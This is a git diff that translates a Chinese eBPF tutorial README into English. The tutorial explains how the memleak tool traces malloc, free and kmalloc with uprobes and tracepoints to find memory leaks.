a/src/16-memleak/README.md +++ b/src/16-memleak/README.md @@ -1,26 +1,24 @@ -# eBPF 入门实践教程十六:编写 eBPF 程序 Memleak 监控内存泄漏 +# eBPF Tutorial by Example 16: Monitoring Memory Leaks -eBPF(扩展的伯克利数据包过滤器)是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。 +eBPF (extended Berkeley Packet Filter) is a powerful network and performance analysis tool that is widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or modifying its source code. -在本篇教程中,我们将探讨如何使用 eBPF 编写 Memleak 程序,以监控程序的内存泄漏。 +In this tutorial, we will explore how to write a Memleak program using eBPF to monitor memory leaks in programs. -## 背景及其重要性 +## Background and Importance -内存泄漏是计算机编程中的一种常见问题,其严重程度不应被低估。内存泄漏发生时,程序会逐渐消耗更多的内存资源,但并未正确释放。随着时间的推移,这种行为会导致系统内存逐渐耗尽,从而显著降低程序及系统的整体性能。 +Memory leaks are a common problem in computer programming and should not be underestimated. When memory leaks occur, programs gradually consume more memory resources without properly releasing them. 
Over time, this behavior can lead to a gradual depletion of system memory, significantly reducing the overall performance of the program and system. -内存泄漏有多种可能的原因。这可能是由于配置错误导致的,例如程序错误地配置了某些资源的动态分配。它也可能是由于软件缺陷或错误的内存管理策略导致的,如在程序执行过程中忘记释放不再需要的内存。此外,如果一个应用程序的内存使用量过大,那么系统性能可能会因页面交换(swapping)而大幅下降,甚至可能导致应用程序被系统强制终止(Linux 的 OOM killer)。 +There are many possible causes of memory leaks. It may be due to misconfiguration, such as a program incorrectly configuring dynamic allocation of certain resources. It may also be due to software bugs or incorrect memory management strategies, such as forgetting to release memory that is no longer needed during program execution. Additionally, if an application's memory usage is too high, system performance may significantly decrease due to paging/swapping, or it may even cause the application to be forcibly terminated by the system's OOM killer (Out of Memory Killer). -### 调试内存泄漏的挑战 +### Challenges of Debugging Memory Leaks -调试内存泄漏问题是一项复杂且挑战性的任务。这涉及到详细检查应用程序的配置、内存分配和释放情况,通常需要应用专门的工具来帮助诊断。例如,有一些工具可以在应用程序启动时将 malloc() 函数调用与特定的检测工具关联起来,如 Valgrind memcheck,这类工具可以模拟 CPU 来检查所有内存访问,但可能会导致应用程序运行速度大大减慢。另一个选择是使用堆分析器,如 libtcmalloc,它相对较快,但仍可能使应用程序运行速度降低五倍以上。此外,还有一些工具,如 gdb,可以获取应用程序的核心转储并进行后处理以分析内存使用情况。然而,这些工具通常在获取核心转储时需要暂停应用程序,或在应用程序终止后才能调用 free() 函数。 +Debugging memory leak issues is a complex and challenging task. This involves detailed examination of the program's configuration, memory allocation, and deallocation, often requiring specialized tools to aid in diagnosis. For example, there are tools that can associate malloc() function calls with specific detection tools, such as Valgrind memcheck, which can simulate the CPU to check all memory accesses, but may greatly slow down the application's execution speed. Another option is to use heap analyzers, such as libtcmalloc, which are relatively faster but may still decrease the application's execution speed by more than five times. Additionally, there are tools like gdb that can obtain core dumps of applications and perform post-processing analysis of memory usage. However, these tools often require pausing the application during core dump acquisition or calling the free() function after the application terminates. -## eBPF 的作用 +## Role of eBPF -在这种背景下,eBPF 的作用就显得尤为重要。eBPF 提供了一种高效的机制来监控和追踪系统级别的事件,包括内存的分配和释放。通过 eBPF,我们可以跟踪内存分配和释放的请求,并收集每次分配的调用堆栈。然后,我们可以分 +In this context, the role of eBPF becomes particularly important. eBPF provides an efficient mechanism for monitoring and tracking system-level events, including memory allocation and deallocation. With eBPF, we can trace memory allocation and deallocation requests and collect the call stacks for each allocation. We can then analyze this information to identify call stacks that perform memory allocations but do not perform subsequent deallocations, helping us identify the source of memory leaks. The advantage of this approach is that it can be done in real-time within a running application without pausing the application or performing complex post-processing. -析这些信息,找出执行了内存分配但未执行释放操作的调用堆栈,这有助于我们找出导致内存泄漏的源头。这种方式的优点在于,它可以实时地在运行的应用程序中进行,而无需暂停应用程序或进行复杂的前后处理。 - -`memleak` eBPF 工具可以跟踪并匹配内存分配和释放的请求,并收集每次分配的调用堆栈。随后,`memleak` 可以打印一个总结,表明哪些调用堆栈执行了分配,但是并没有随后进行释放。例如,我们运行命令: +The `memleak` eBPF tool can trace and match memory allocation and deallocation requests, and collect the call stacks for each allocation. Subsequently, `memleak` can print a summary indicating which call stacks executed allocations but did not perform subsequent deallocations. 
For example, running the command: ```console # ./memleak -p $(pidof allocs) @@ -36,23 +34,23 @@ Attaching to pid 5193, Ctrl+C to quit. __libc_start_main+0xf0 [libc-2.21.so] ``` -运行这个命令后,我们可以看到分配但未释放的内存来自于哪些堆栈,并且可以看到这些未释放的内存的大小和数量。 +After running this command, we can see which stacks the allocated but not deallocated memory came from, as well as the size and quantity of these unreleased memory blocks. -随着时间的推移,很显然,`allocs` 进程的 `main` 函数正在泄漏内存,每次泄漏 16 字节。幸运的是,我们不需要检查每个分配,我们得到了一个很好的总结,告诉我们哪个堆栈负责大量的泄漏。 +Over time, it becomes evident that the `main` function of the `allocs` process is leaking memory, 16 bytes at a time. Fortunately, we don't need to inspect each allocation; we have a nice summary that tells us which stack is responsible for the significant leaks. -## memleak 的实现原理 +## Implementation Principle of memleak -在基本层面上,`memleak` 的工作方式类似于在内存分配和释放路径上安装监控设备。它通过在内存分配和释放函数中插入 eBPF 程序来达到这个目标。这意味着,当这些函数被调用时,`memleak` 就会记录一些重要信息,如调用者的进程 ID(PID)、分配的内存地址以及分配的内存大小等。当释放内存的函数被调用时,`memleak` 则会在其内部的映射表(map)中删除相应的内存分配记录。这种机制使得 `memleak` 能够准确地追踪到哪些内存块已被分配但未被释放。 +At a basic level, `memleak` operates by installing monitoring devices on the memory allocation and deallocation paths. It achieves this by inserting eBPF programs into memory allocation and deallocation functions. This means that when these functions are called, `memleak` will record important information, such as the caller's process ID (PID), the allocated memory address, and the size of the allocated memory. When the function for freeing memory is called, `memleak` will delete the corresponding memory allocation record in its internal map. This mechanism allows `memleak` to accurately trace which memory blocks have been allocated but not deallocated.For commonly used memory allocation functions in user space, such as `malloc` and `calloc`, `memleak` uses user space probing (uprobe) technology for monitoring. Uprobe is a dynamic tracing technology for user space applications, which can set breakpoints at any location at runtime without modifying the binary files, thus achieving tracing of specific function calls. -对于用户态的常用内存分配函数,如 `malloc` 和 `calloc` 等,`memleak` 利用了用户态探测(uprobe)技术来实现监控。uprobe 是一种用于用户空间应用程序的动态追踪技术,它可以在运行时不修改二进制文件的情况下在任意位置设置断点,从而实现对特定函数调用的追踪。Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 +Uprobe in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode and is compatible with kernel mode eBPF, avoiding context switching between kernel mode and user mode, thereby improving the execution efficiency of eBPF programs by 10 times. -对于内核态的内存分配函数,如 `kmalloc` 等,`memleak` 则选择使用了 tracepoint 来实现监控。Tracepoint 是一种在 Linux 内核中提供的动态追踪技术,它可以在内核运行时动态地追踪特定的事件,而无需重新编译内核或加载内核模块。 +For kernel space memory allocation functions, such as `kmalloc`, `memleak` chooses to use tracepoints for monitoring. Tracepoint is a dynamic tracing technology provided in the Linux kernel, which can dynamically trace specific events in the kernel at runtime without recompiling the kernel or loading kernel modules. 
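+
+To make this concrete, here is a minimal, self-contained sketch of such a tracepoint hook. This is illustrative only and not part of memleak; it assumes the `trace_event_raw_kmem_alloc` context layout that memleak's own tracepoint programs use later in this article:
+
+```c
+#include <vmlinux.h>
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_core_read.h>
+
+/* Sketch: log the address and size of every kmalloc the kernel performs. */
+SEC("tracepoint/kmem/kmalloc")
+int trace_kmalloc(struct trace_event_raw_kmem_alloc *ctx)
+{
+	const void *ptr = BPF_CORE_READ(ctx, ptr);      /* address returned by kmalloc */
+	size_t bytes = BPF_CORE_READ(ctx, bytes_alloc); /* bytes actually allocated */
+
+	bpf_printk("kmalloc ptr=%lx size=%lu\n", (unsigned long)ptr, bytes);
+	return 0;
+}
+
+char LICENSE[] SEC("license") = "Dual BSD/GPL";
+```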
-## 内核态 eBPF 程序实现
-
-## `memleak` 内核态 eBPF 程序实现
+## `memleak` Kernel Space eBPF Program Implementation

-`memleak` 的内核态 eBPF 程序包含一些用于跟踪内存分配和释放的关键函数。在我们深入了解这些函数之前,让我们首先观察 `memleak` 所定义的一些数据结构,这些结构在其内核态和用户态程序中均有使用。
+The kernel space eBPF program of `memleak` contains some key functions for tracking memory allocation and deallocation. Before delving into these functions, let's first take a look at some data structures defined by `memleak`, which are used in both its kernel space and user space programs.

```c
#ifndef __MEMLEAK_H
@@ -62,29 +60,29 @@ Attaching to pid 5193, Ctrl+C to quit.
#define COMBINED_ALLOCS_MAX_ENTRIES 10240

struct alloc_info {
-	__u64 size; // 分配的内存大小
-	__u64 timestamp_ns; // 分配时的时间戳,单位为纳秒
-	int stack_id; // 分配时的调用堆栈ID
+	__u64 size; // Size of allocated memory
+	__u64 timestamp_ns; // Timestamp when allocation occurs, in nanoseconds
+	int stack_id; // Call stack ID when allocation occurs
};

union combined_alloc_info {
	struct {
-		__u64 total_size : 40; // 所有未释放分配的总大小
-		__u64 number_of_allocs : 24; // 所有未释放分配的总次数
+		__u64 total_size : 40; // Total size of all unreleased allocations
+		__u64 number_of_allocs : 24; // Total number of unreleased allocations
	};
-	__u64 bits; // 结构的位图表示
+	__u64 bits; // Bitwise representation of the structure
};

#endif /* __MEMLEAK_H */
```

-这里定义了两个主要的数据结构:`alloc_info` 和 `combined_alloc_info`。
+Here, two main data structures are defined: `alloc_info` and `combined_alloc_info`.

-`alloc_info` 结构体包含了一个内存分配的基本信息,包括分配的内存大小 `size`、分配发生时的时间戳 `timestamp_ns`,以及触发分配的调用堆栈 ID `stack_id`。
+The `alloc_info` structure contains basic information about a memory allocation, including the allocated memory size `size`, the timestamp `timestamp_ns` when the allocation occurs, and the call stack ID `stack_id` that triggers the allocation.

-`combined_alloc_info` 是一个联合体(union),它包含一个嵌入的结构体和一个 `__u64` 类型的位图表示 `bits`。嵌入的结构体有两个成员:`total_size` 和 `number_of_allocs`,分别代表所有未释放分配的总大小和总次数。其中 40 和 24 分别表示 total_size 和 number_of_allocs这两个成员变量所占用的位数,用来限制其大小。通过这样的位数限制,可以节省combined_alloc_info结构的存储空间。同时,由于total_size和number_of_allocs在存储时是共用一个unsigned long long类型的变量bits,因此可以通过在成员变量bits上进行位运算来访问和修改total_size和number_of_allocs,从而避免了在程序中定义额外的变量和函数的复杂性。
+The `combined_alloc_info` is a union that contains an embedded structure and a `__u64` type bitwise representation `bits`. The embedded structure has two members: `total_size` and `number_of_allocs`, representing the total size and total count of unreleased allocations, respectively. The numbers 40 and 24 indicate the number of bits occupied by the `total_size` and `number_of_allocs` members, limiting their size. By using this limitation, storage space for the `combined_alloc_info` structure can be saved. Moreover, since `total_size` and `number_of_allocs` share the same `unsigned long long` type variable `bits` for storage, bitwise operations on the member variable `bits` can be used to access and modify `total_size` and `number_of_allocs`, avoiding the complexity of defining additional variables and functions in the program.

-接下来,`memleak` 定义了一系列用于保存内存分配信息和分析结果的 eBPF 映射(maps)。这些映射都以 `SEC(".maps")` 的形式定义,表示它们属于 eBPF 程序的映射部分。
+Next, `memleak` defines a series of eBPF maps for storing memory allocation information and analysis results. These maps are defined in the form of `SEC(".maps")`, indicating that they belong to the mapping section of the eBPF program.

```c
const volatile size_t min_size = 0;
@@ -103,7 +101,7 @@ struct {
} sizes SEC(".maps");

struct {
	__uint(type, BPF_MAP_TYPE_HASH);
	__type(key, u64); /* address */
	__type(value, struct alloc_info);
	__uint(max_entries, ALLOCS_MAX_ENTRIES);
@@ -131,52 +129,52 @@ struct {
static union combined_alloc_info initial_cinfo;
```

-这段代码首先定义了一些可配置的参数,如 `min_size`, `max_size`, `page_size`, `sample_rate`, `trace_all`, `stack_flags` 和 `wa_missing_free`,分别表示最小分配大小、最大分配大小、页面大小、采样率、是否追踪所有分配、堆栈标志和是否工作在缺失释放(missing free)模式。
+The code first defines some configurable parameters, such as `min_size`, `max_size`, `page_size`, `sample_rate`, `trace_all`, `stack_flags`, and `wa_missing_free`, representing the minimum allocation size, maximum allocation size, page size, sample rate, whether to trace all allocations, stack flags, and whether to work in missing free mode.

-接着定义了五个映射:
+Then, five maps are defined:

-1. `sizes`:这是一个哈希类型的映射,键为进程 ID,值为 `u64` 类型,存储每个进程的分配大小。
-2. `allocs`:这也是一个哈希类型的映射,键为分配的地址,值为 `alloc_info` 结构体,存储每个内存分配的详细信息。
-3. `combined_allocs`:这是另一个哈希类型的映射,键为堆栈 ID,值为 `combined_alloc_info` 联合体,存储所有未释放分配的总大小和总次数。
-4. `memptrs`:这也是一个哈希类型的映射,键和值都为 `u64` 类型,用于在用户空间和内核空间之间传递内存指针。
-5. `stack_traces`:这是一个堆栈追踪类型的映射,键为 `u32` 类型,用于存储堆栈 ID。
+1. `sizes`: This is a hash-type map with the key as the process ID and the value as `u64` type, storing the allocation size of each process.
+2. `allocs`: This is also a hash-type map with the key as the allocation address and the value as the `alloc_info` structure, storing detailed information about each memory allocation.
+3. `combined_allocs`: This is another hash-type map with the key as the stack ID and the value as the `combined_alloc_info` union, storing the total size and count of all unreleased allocations.
+4. `memptrs`: This is also a hash-type map with both the key and value as `u64` type, used to pass memory pointers between user space and kernel space.
+5. `stack_traces`: This is a stack trace-type map with the key as `u32` type, used to store stack IDs.

-以用户态的内存分配追踪部分为例,主要是挂钩内存相关的函数调用,如 `malloc`, `free`, `calloc`, `realloc`, `mmap` 和 `munmap`,以便在调用这些函数时进行数据记录。在用户态,`memleak` 主要使用了 uprobes 技术进行挂载。
+Taking the user-space memory allocation tracing as an example, it mainly hooks memory-related function calls such as `malloc`, `free`, `calloc`, `realloc`, `mmap`, and `munmap` to record data when these functions are called. In user space, `memleak` mainly uses uprobes technology for attaching these hooks.

-每个函数调用被分为 "enter" 和 "exit" 两部分。"enter" 部分记录的是函数调用的参数,如分配的大小或者释放的地址。"exit" 部分则主要用于获取函数的返回值,如分配得到的内存地址。
+Each function call is divided into "enter" and "exit" parts. The "enter" part records the function call parameters, such as the size of the allocation or the address being freed. The "exit" part is mainly used to obtain the return value of the function, such as the memory address obtained from the allocation.

-这里,`gen_alloc_enter`, `gen_alloc_exit`, `gen_free_enter` 是实现记录行为的函数,他们分别用于记录分配开始、分配结束和释放开始的相关信息。
+Here, `gen_alloc_enter`, `gen_alloc_exit`, `gen_free_enter` are functions that implement the recording behavior, and they are used to record relevant information when allocation starts, allocation ends, and freeing starts, respectively.
-函数原型示例如下: +The function prototype is as follows: ```c SEC("uprobe") int BPF_KPROBE(malloc_enter, size_t size) { - // 记录分配开始的相关信息 + // Record relevant information when allocation starts return gen_alloc_enter(size); } SEC("uretprobe") int BPF_KRETPROBE(malloc_exit) { - // 记录分配结束的相关信息 + // Record relevant information when allocation ends return gen_alloc_exit(ctx); } SEC("uprobe") int BPF_KPROBE(free_enter, void *address) { - // 记录释放开始的相关信息 + // Record relevant information when freeing starts return gen_free_enter(address); } ``` -其中,`malloc_enter` 和 `free_enter` 是分别挂载在 `malloc` 和 `free` 函数入口处的探针(probes),用于在函数调用时进行数据记录。而 `malloc_exit` 则是挂载在 `malloc` 函数的返回处的探针,用于记录函数的返回值。 +`malloc_enter` and `free_enter` are probes mounted at the entry points of the `malloc` and `free` functions, respectively, to record data during function calls. `malloc_exit` is a probe mounted at the return point of the `malloc` function to record the return value of the function. -这些函数使用了 `BPF_KPROBE` 和 `BPF_KRETPROBE` 这两个宏来声明,这两个宏分别用于声明 kprobe(内核探针)和 kretprobe(内核返回探针)。具体来说,kprobe 用于在函数调用时触发,而 kretprobe 则是在函数返回时触发。 +These functions are declared using the `BPF_KPROBE` and `BPF_KRETPROBE` macros, which are used to declare kprobes (kernel probes) and kretprobes (kernel return probes), respectively. Specifically, kprobe is triggered during function calls, while kretprobe is triggered during function returns. -`gen_alloc_enter` 函数是在内存分配请求的开始时被调用的。这个函数主要负责在调用分配内存的函数时收集一些基本的信息。下面我们将深入探讨这个函数的实现。 +The `gen_alloc_enter` function is called at the beginning of a memory allocation request. This function is mainly responsible for collecting some basic information when the function that allocates memory is called. Now, let's take a deep dive into the implementation of this function. ```c static int gen_alloc_enter(size_t size) @@ -205,20 +203,18 @@ int BPF_KPROBE(malloc_enter, size_t size) } ``` -首先,`gen_alloc_enter` 函数接收一个 `size` 参数,这个参数表示请求分配的内存的大小。如果这个值不在 `min_size` 和 `max_size` 之间,函数将直接返回,不再进行后续的操作。这样可以使工具专注于追踪特定范围的内存分配请求,过滤掉不感兴趣的分配请求。 +First, the `gen_alloc_enter` function takes a `size` parameter that represents the size of the requested memory allocation. If this value is not between `min_size` and `max_size`, the function will return directly without performing any further operations. This allows the tool to focus on tracing memory allocation requests within a specific range and filter out uninteresting allocation requests. -接下来,函数检查采样率 `sample_rate`。如果 `sample_rate` 大于1,意味着我们不需要追踪所有的内存分配请求,而是周期性地追踪。这里使用 `bpf_ktime_get_ns` 获取当前的时间戳,然后通过取模运算来决定是否需要追踪当前的内存分配请求。这是一种常见的采样技术,用于降低性能开销,同时还能够提供一个代表性的样本用于分析。 +Next, the function checks the sampling rate `sample_rate`. If `sample_rate` is greater than 1, it means that we don't need to trace all memory allocation requests, but rather trace them periodically. Here, `bpf_ktime_get_ns` is used to get the current timestamp, and the modulus operation is used to determine whether to trace the current memory allocation request. This is a common sampling technique used to reduce performance overhead while providing a representative sample for analysis. -之后,函数使用 `bpf_get_current_pid_tgid` 函数获取当前进程的 PID。注意这里的 PID 实际上是进程和线程的组合 ID,我们通过右移 32 位来获取真正的进程 ID。 +Then, the function uses the `bpf_get_current_pid_tgid` function to retrieve the current process's PID. Note that the PID here is actually a combination of the process ID and thread ID, and we shift it right by 32 bits to get the actual process ID. 
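+
+This packing is easy to get wrong, so here is a tiny illustrative helper (not part of memleak's source) that shows the split:
+
+```c
+/* Illustrative helper: bpf_get_current_pid_tgid() packs the process id
+ * (tgid) in the upper 32 bits and the thread id in the lower 32 bits. */
+static __always_inline u32 current_process_id(void)
+{
+	u64 id = bpf_get_current_pid_tgid();
+
+	return id >> 32; /* keep the process id, drop the thread id */
+}
+```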
-函数接下来更新 `sizes` 这个 map,这个 map 以进程 ID 为键,以请求的内存分配大小为值。`BPF_ANY` 表示如果 key 已存在,那么更新 value,否则就新建一个条目。
+The function then updates the `sizes` map, which uses the process ID as the key and the requested memory allocation size as the value. `BPF_ANY` indicates that if the key already exists, the value will be updated; otherwise, a new entry will be created.

-最后,如果启用了 `trace_all` 标志,函数将打印一条信息,说明发生了内存分配。
+Finally, if the `trace_all` flag is enabled, the function will print a message indicating that a memory allocation has occurred.

-`BPF_KPROBE` 宏用于
-
-最后定义了 `BPF_KPROBE(malloc_enter, size_t size)`,它会在 `malloc` 函数被调用时被 BPF uprobe 拦截执行,并通过 `gen_alloc_enter` 来记录内存分配大小。
-我们刚刚分析了内存分配的入口函数 `gen_alloc_enter`,现在我们来关注这个过程的退出部分。具体来说,我们将讨论 `gen_alloc_exit2` 函数以及如何从内存分配调用中获取返回的内存地址。
+Finally, `BPF_KPROBE(malloc_enter, size_t size)` is defined; it is intercepted and executed by a BPF uprobe when the `malloc` function is called, and it records the memory allocation size via `gen_alloc_enter`.
+
+We have just analyzed the entry function `gen_alloc_enter` of memory allocation; now let's focus on the exit part of this process. Specifically, we will discuss the `gen_alloc_exit2` function and how to obtain the returned memory address from the memory allocation call.

```c
static int gen_alloc_exit2(void *ctx, u64 address)
@@ -232,8 +228,7 @@ static int gen_alloc_exit2(void *ctx, u64 address)

	__builtin_memset(&info, 0, sizeof(info));

	info.size = *size;
	bpf_map_delete_elem(&sizes, &pid);

	if (address != 0) {
		info.timestamp_ns = bpf_ktime_get_ns();
@@ -252,6 +247,7 @@ static int gen_alloc_exit2(void *ctx, u64 address)
	return 0;
}

+
static int gen_alloc_exit(struct pt_regs *ctx)
{
	return gen_alloc_exit2(ctx, PT_REGS_RC(ctx));
@@ -264,18 +260,19 @@ int BPF_KRETPROBE(malloc_exit)
}
```

-`gen_alloc_exit2` 函数在内存分配操作完成时被调用,这个函数接收两个参数,一个是上下文 `ctx`,另一个是内存分配函数返回的内存地址 `address`。
+The `gen_alloc_exit2` function is called when the memory allocation operation is completed. This function takes two parameters: the context `ctx`, and the memory address returned by the memory allocation function, `address`.

-首先,它获取当前线程的 PID,然后使用这个 PID 作为键在 `sizes` 这个 map 中查找对应的内存分配大小。如果没有找到(也就是说,没有对应的内存分配操作的入口),函数就会直接返回。
+First, it obtains the PID (Process ID) of the current thread and uses it as a key to look up the corresponding memory allocation size in the `sizes` map. If not found (i.e., no entry for the memory allocation operation), the function simply returns.

-接着,函数清除 `info` 结构体的内容,并设置它的 `size` 字段为之前在 map 中找到的内存分配大小。并从 `sizes` 这个 map 中删除相应的元素,因为此时内存分配操作已经完成,不再需要这个信息。
+Then, it clears the content of the `info` structure and sets its `size` field to the memory allocation size found in the map. It also removes the corresponding element from the `sizes` map because the memory allocation operation has completed and this information is no longer needed.

-接下来,如果 `address` 不为 0(也就是说,内存分配操作成功了),函数就会进一步收集一些额外的信息。首先,它获取当前的时间戳作为内存分配完成的时间,并获取当前的堆栈跟踪。这些信息都会被储存在 `info` 结构体中,并随后更新到 `allocs` 这个 map 中。
+Next, if `address` is not zero (indicating a successful memory allocation operation), the function further collects some additional information. First, it obtains the current timestamp as the completion time of the memory allocation and fetches the current stack trace. These pieces of information are stored in the `info` structure and subsequently updated in the `allocs` map.
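+
+The hunk above elides the stack-trace capture, so here is a simplified sketch of that step (not a verbatim quote of the elided code); it uses the `stack_traces` map and `stack_flags` constant defined earlier:
+
+```c
+	/* Sketch: stamp the allocation and remember where it came from. */
+	info.timestamp_ns = bpf_ktime_get_ns();
+	info.stack_id = bpf_get_stackid(ctx, &stack_traces, stack_flags);
+	bpf_map_update_elem(&allocs, &address, &info, BPF_ANY);
+```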
-最后,函数调用 `update_statistics_add` 更新统计数据,如果启用了所有内存分配操作的跟踪,函数还会打印一些关于内存分配操作的信息。
+Finally, the function calls `update_statistics_add` to update the statistics data and, if tracing of all memory allocation operations is enabled, it prints some information about the memory allocation operation.

-请注意,`gen_alloc_exit` 函数是 `gen_alloc_exit2` 的一个包装,它将 `PT_REGS_RC(ctx)` 作为 `address` 参数传递给 `gen_alloc_exit2`。`
-在我们的讨论中,我们刚刚提到在 `gen_alloc_exit2` 函数中,调用了 `update_statistics_add` 函数以更新内存分配的统计数据。下面我们详细看一下这个函数的具体实现。
+Note that `gen_alloc_exit` is a wrapper for `gen_alloc_exit2`, which passes `PT_REGS_RC(ctx)` as the `address` parameter to `gen_alloc_exit2`.
+
+In our discussion, we just mentioned that the `update_statistics_add` function is called in the `gen_alloc_exit2` function to update the statistics data for memory allocations. Now let's take a closer look at the implementation of this function.

```c
static void update_statistics_add(u64 stack_id, u64 sz)
@@ -295,68 +292,30 @@ static void update_statistics_add(u64 stack_id, u64 sz)
}
```

-`update_statistics_add` 函数接收两个参数:当前的堆栈 ID `stack_id` 以及内存分配的大小 `sz`。这两个参数都在内存分配事件中收集到,并且用于更新内存分配的统计数据。
+The `update_statistics_add` function takes two parameters: the current stack ID `stack_id` and the size of the memory allocation `sz`. These two parameters are collected in the memory allocation event and used to update the statistics data for memory allocations.
+
+First, the function tries to find the element with the current stack ID as the key in the `combined_allocs` map. If it is not found, a new element is initialized with `initial_cinfo` (which is a default `combined_alloc_info` structure with all fields set to zero).
-首先,函数尝试在 `combined_allocs` 这个 map 中查找键值为当前堆栈 ID 的元素,如果找不到,就用 `initial_cinfo`(这是一个默认的 combined_alloc_info 结构体,所有字段都为零)来初始化新的元素。

-接着,函数创建一个 `incremental_cinfo`,并设置它的 `total_size` 为当前内存分配的大小,设置 `number_of_allocs` 为 1。这是因为每次调用 `update_statistics_add` 函数都表示有一个新的内存分配事件发生,而这个事件的内存分配大小就是 `sz`。
+Next, the function creates an `incremental_cinfo` and sets its `total_size` to the current memory allocation size and `number_of_allocs` to 1. This is because each call to the `update_statistics_add` function represents a new memory allocation event, and the size of this event's memory allocation is `sz`.

-最后,函数使用 `__sync_fetch_and_add` 函数原子地将 `incremental_cinfo` 的值加到 `existing_cinfo` 中。请注意这个步骤是线程安全的,即使有多个线程并发地调用 `update_statistics_add` 函数,每个内存分配事件也能正确地记录到统计数据中。
+Finally, the function atomically adds the value of `incremental_cinfo` to `existing_cinfo` using the `__sync_fetch_and_add` function. Note that this step is thread-safe, so even if multiple threads call the `update_statistics_add` function concurrently, each memory allocation event will be correctly recorded in the statistics.

-总的来说,`update_statistics_add` 函数实现了内存分配统计的更新逻辑,通过维护每个堆栈 ID 的内存分配总量和次数,我们可以深入了解到程序的内存分配行为。
+In summary, the `update_statistics_add` function implements the logic for updating memory allocation statistics. By maintaining the total amount and number of memory allocations for each stack ID, we can gain insight into the memory allocation behavior of the program.

-在我们对内存分配的统计跟踪过程中,我们不仅要统计内存的分配,还要考虑内存的释放。在上述代码中,我们定义了一个名为 `update_statistics_del` 的函数,其作用是在内存释放时更新统计信息。而 `gen_free_enter` 函数则是在进程调用 `free` 函数时被执行。
+In our process of tracking memory allocation statistics, we not only need to count memory allocations but also consider memory releases. In the code below, we define a function called `update_statistics_del` that updates the statistics when memory is freed.
The function `gen_free_enter` is executed when the process calls the `free` function.
+
+The `update_statistics_del` function takes the stack ID and the size of the memory block to be freed as parameters. First, the function uses the current stack ID as the key to look up the corresponding `combined_alloc_info` structure in the `combined_allocs` map. If it is not found, an error message is output and the function returns. If it is found, a `combined_alloc_info` structure named `decremental_cinfo` is constructed, with its `total_size` set to the size of the memory to be freed and `number_of_allocs` set to 1. Then the `__sync_fetch_and_sub` function is used to atomically subtract the value of `decremental_cinfo` from `existing_cinfo`. Note that the value is subtracted rather than added, so both the outstanding total size and the outstanding allocation count decrease by one allocation's worth.
+
+The `gen_free_enter` function takes the address to be freed as a parameter. It first converts the address to an unsigned 64-bit integer (`u64`). Then it looks up the `alloc_info` structure in the `allocs` map using the address as the key. If it is not found, the function returns 0. If it is found, the `alloc_info` structure is deleted from the `allocs` map, and the `update_statistics_del` function is called with the stack ID and size from `info`. If `trace_all` is true, an information message is output.

```c
static void update_statistics_del(u64 stack_id, u64 sz)
{
	union combined_alloc_info *existing_cinfo;

	existing_cinfo = bpf_map_lookup_elem(&combined_allocs, &stack_id);
	if (!existing_cinfo) {
		bpf_printk("failed to lookup combined allocs\n");
		return;
	}

	const union combined_alloc_info decremental_cinfo = {
		.total_size = sz,
		.number_of_allocs = 1
	};

	__sync_fetch_and_sub(&existing_cinfo->bits, decremental_cinfo.bits);
}
```

-`update_statistics_del` 函数的参数为堆栈 ID 和要释放的内存块大小。函数首先在 `combined_allocs` 这个 map 中使用当前的堆栈 ID 作为键来查找相应的 `combined_alloc_info` 结构体。如果找不到,就输出错误信息,然后函数返回。如果找到了,就会构造一个名为 `decremental_cinfo` 的 `combined_alloc_info` 结构体,设置它的 `total_size` 为要释放的内存大小,设置 `number_of_allocs` 为 1。然后使用 `__sync_fetch_and_sub` 函数原子地从 `existing_cinfo` 中减去 `decremental_cinfo` 的值。请注意,这里的 `number_of_allocs` 是负数,表示减少了一个内存分配。

```c
static int gen_free_enter(const void *address)
{
	const u64 addr = (u64)address;

	const struct alloc_info *info = bpf_map_lookup_elem(&allocs, &addr);
	if (!info)
		return 0;

	bpf_map_delete_elem(&allocs, &addr);
	update_statistics_del(info->stack_id, info->size);

	if (trace_all) {
		bpf_printk("free entered, address = %lx, size = %lu\n",
			address, info->size);
	}

	return 0;
}

SEC("uprobe")
int BPF_KPROBE(free_enter, void *address)
{
	return gen_free_enter(address);
}
```

-接下来看 `gen_free_enter` 函数。它接收一个地址作为参数,这个地址是内存分配的结果,也就是将要释放的内存的起始地址。函数首先在 `allocs` 这个 map 中使用这个地址作为键来查找对应的 `alloc_info` 结构体。如果找不到,那么就直接返回,因为这意味着这个地址并没有被分配过。如果找到了,那么就删除这个元素,并且调用 `update_statistics_del` 函数来更新统计数据。最后,如果启用了全局追踪,那么还会输出一条信息,包括这个地址以及它的大小。
-在我们追踪和统计内存分配的同时,我们也需要对内核态的内存分配和释放进行追踪。在Linux内核中,kmem_cache_alloc函数和kfree函数分别用于内核态的内存分配和释放。
+Next, let's look at the `gen_free_enter` function. It takes an address as a parameter, which is the result of memory allocation, i.e., the starting address of the memory to be freed. The function first uses this address as a key to search for the corresponding `alloc_info` structure in the `allocs` map. If it is not found, it simply returns because it means that this address has not been allocated.
